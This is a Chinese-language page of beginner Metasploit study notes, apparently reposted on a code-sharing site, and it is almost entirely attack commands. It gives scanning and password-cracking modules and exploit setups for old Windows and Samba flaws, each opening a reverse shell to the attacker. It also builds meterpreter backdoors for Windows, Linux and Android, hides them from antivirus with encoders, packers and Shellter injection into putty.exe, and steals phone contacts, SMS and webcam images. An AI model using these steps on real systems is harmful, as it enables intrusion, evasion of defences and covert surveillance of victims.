msf入門學習筆記



        

                                                                                          msf
——————————————————————————————————————

service postgresql start
service metasploit start
msfconsole
進入后輸入db_status  查看數據庫連接狀態
workspace -a test 創建工作台
Workspace test 進入工作台
信息收集

      msf> whois xxx.com
      msf>whois 192.168.1.100

    在線收集服務器ip信息工具 :
    http://searchdns.netcraft.com/

      nmap -sS xxx  (-O 看操作系統)    
          msf>use auxiliary/scanner/ip/ipidseq  看某個網段誰開了**端口。  show options  看配置。set **  設置。run 開始

       msf>use auxiliary/scanner/portscan/syn  掃描開放端口 set RHOSTS ***  。set THREADS 50
    
      msf>use auxiliary/scanner/smb/smb_version 掃描網段開放445的 。 set RHOSTS 192.168.2.0/24 。set THREADS 50
    
          msf>use auxiliary/scanner/mssql/mssql_ping 掃描開放mssql
          msf>use auxiliary/scanner/ssh/ssh_version 掃描網段ssh服務器
          msf>use auxiliary/scanner/telnet/telnet_version 掃描網段telnet
          msf>use auxiliary/scanner/ftp/ftp_version 掃描網段ftp
          msf>use auxiliary/scanner/ftp/anonymous 掃描網段ftp可匿名登錄的
          msf>use auxiliary/scanner/discovery/arp_sweep 存活主機
          msf>use auxiliary/scanner/http/dir_scanner 網站目錄
          msf>use auxiliary/scanner/snmp/snmp_login 掃描snmp主機
          msf>use auxiliary/gather/search_email_collector 搜索網站中email地址 set DOMAIN **.com
          msf>use auxiliary/sniffer/psnuffle 嗅探抓包(ftp密碼)
          search mysql_login  搜索mysql口令破解模塊,並利用
          search postgre_login  搜索post sql口令破解模塊
                 telnet
          search tomcat_mgr_login  搜索tomcat口令破解模
          search ssh_login  搜索ssh口令破解模塊
          msf>use auxiliary/scanner/smb/samba_version 破解samba

微軟等漏洞利用 如
     ms10_002  (瀏覽器漏洞):
      msf>search ms10_002
      msf>use exploit/windows/browser/ms10_002_aurora
       msf>set SRVHOST  192.168...            本機ip
      msf>set payload windows/meterpreter/reverse_tcp 偵聽反彈shell載荷
        msf>set SRVPORT 80   接受的端口 不設置默認8080
      msf>set URIPATH /    可有無  根目錄
      msf>set LHOST 192.168...              本機ip
      msf>set LPORT 1211                    本地端口
      msf>exploit 攻擊
          會有生成一個網址 給目標打開,之后返回 一些信息 session 1
      之后 輸入 msf>session -i 查看會話和id*  
          使用 msf>sessions -i *  
           meterpreter>shell   獲得shell 可輸入cmd命令ipconfig whoami    
      ctrl z 退出   ctrl c 后台運行
————————
     ms10_018 (瀏覽器漏洞):
    msf>search  ms10_018
     msf>set SRVHOST  192.168...            本機ip
    msf>set SRVPORT 8081           注意沖突
    msf>set payload windows/shell/reverse_tcp   用shell 攻擊性低
     msf>set LHOST 192.168...              本機ip
    msf>set LPORT 1211                    本地端口
    msf>exploit 攻擊
     會有生成一個網址 給目標打開
    輸入 msf>session -i 查看會話和id*
————————*****藍屏
     ms12_020 (需要開3389   在win 輸入netstat -an |find“3389” 查)
    search 結果  第二個搜索漏洞  第一個利用
————————
    ms10_046  (范圍廣泛)
    msf>set SRVHOST  192.168...          
    msf>set SRVPORT 80   
    msf>set payload windows/shell/reverse_tcp   
     msf>set LHOST 192.168...             
    msf>set LPORT                           
 
生成兩個 一個是共享(//***)另個為網址 轉化后和第一個一樣 里面有文件,打開即可
————————
    ms08_067 (早期,測試,范圍廣)
     msf>use
    msf>set RHOST ***(mubiao)
    msf>s    
(show target)
    msf>set target **  填目標版本對應的id
————————
    ms12_004 瀏覽器 xpsp3 ,ie 6 7 8          *
     msf>use
     msf>set payload windows/meterpreter/reverse_tcp
    msf>set SRVHOST  192.168...          
    msf>set SRVPORT **    
     msf>set LHOST 192.168...             
    msf>set LPORT   
    exploit     
————————
    linux samba 漏洞  適應版本 debain 3.1*3.2
    search samba
    use linux/samba/lsa_transnames_heap
    show payload
    set payload linux /x86/shell_bind_tcp           ?
    set LPORT 8080
    set RHOST 192.168
    exploit
————————
    dll 注入(到目標系統)
    use exploit/windows/browser/wendab_dll_hijacker
     msf>set payload windows/meterpreter/reverse_tcp
    msf>set SRVHOST  192.168...          
    msf>set SRVPORT 80 必須80  
     msf>set RHORT **
     msf>set LHOST 192.168...             
    msf>set LPORT   
    msf>set urlpath /
————————————————————————————————————————————————
 shellcode 使用
    (少於遠控 功能單一 可以生成 windows linux andriond java php)
——————    
   windows
    
    -# msfpayload windows/meterpreter/reverse_tcp LHOST=** LPORT=1211 X >shy.exe
    ****
    ****編碼免殺 (-t 輸出形式;-c編碼次數,次數過多可能會使shellcode失            效;-e 加編碼類型 ;可用msfencode -l 查看所有編碼)
    -# msfpayload windows/meterpreter/reverse_tcp LHOST=** LPORT=1211 R|msfencode -e x86/shikata_ga_nai -c 5 -t raw |msfencode -e x86/alpha_upper -c 2 -t raw |msfencode -e x86/countdown -c 5 -t exe -o /root/shy.exe
    ****
    ****加殼免殺 (upx殼)
    -#upx -5 shy.exe
    ****
    ****veil 免殺
    ****
    ****shellter免殺 (shellcode代碼注入工具)
找一個正常運行的exe,如putty.exe,向其注入。將工具shellterv4放入kali,解壓unzip shellter_v4.0.zip,進入所解壓的目錄,運行shellter.exe(提升其權限,chmod 777 shellter.exe).(A/M/H,選A).PE Target: /root/putty.exe (L/C/H 選L 后輸入1)。set LHOST: *** 。 SET LPORT **  。
    配置監聽載荷:
    msf>use payload windows/meterpreter/reverse_tcp
    msf>set LHOST **
    msf>set LPORT **
    ****
    ****    
    msf>use exploit/multi/handler
    msf>set payload windows/meterpreter/reverse_tcp
    msf>set LHOST  ***133
    msf>set LPORT   一致
    exploit
      可以用 -# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=*  LPORT=*  E
——————
 linux
    -# msfpayload linux/x86/meterpreter/reverse_tcp LHOST=** LPORT=1211 X >/root/shy.exe
     監聽
    msf>use exploit/multi/handler
    msf>set payload linux /x86/meterpreter/reverse_tcp
    msf>set LHOST  ***133
    msf>set LPORT   一致
    exploit

      可以用 -# msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=*  LPORT=*  E
在目標linux中修改exe權限 # chmod 777 shy。exe
然后。/shy 執行
——————
android

    -# msfpayload andriod/meterpreter/reverse_tcp LHOST=** LPORT=1211  R>/root/shy.apk
    監聽
    msf>use exploit/multi/handler
    msf>set payload andriod/meterpreter/reverse_tcp
    msf>set LHOST  ***133
    msf>set LPORT   一致
    exploit
    dump_contacts  到出電話
    dump_sms
    Webcam_list 看有幾個攝像頭
    -i 1  選擇后面攝像頭
    webcam_snap 拍照
    webcam_stream 開攝像頭




免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM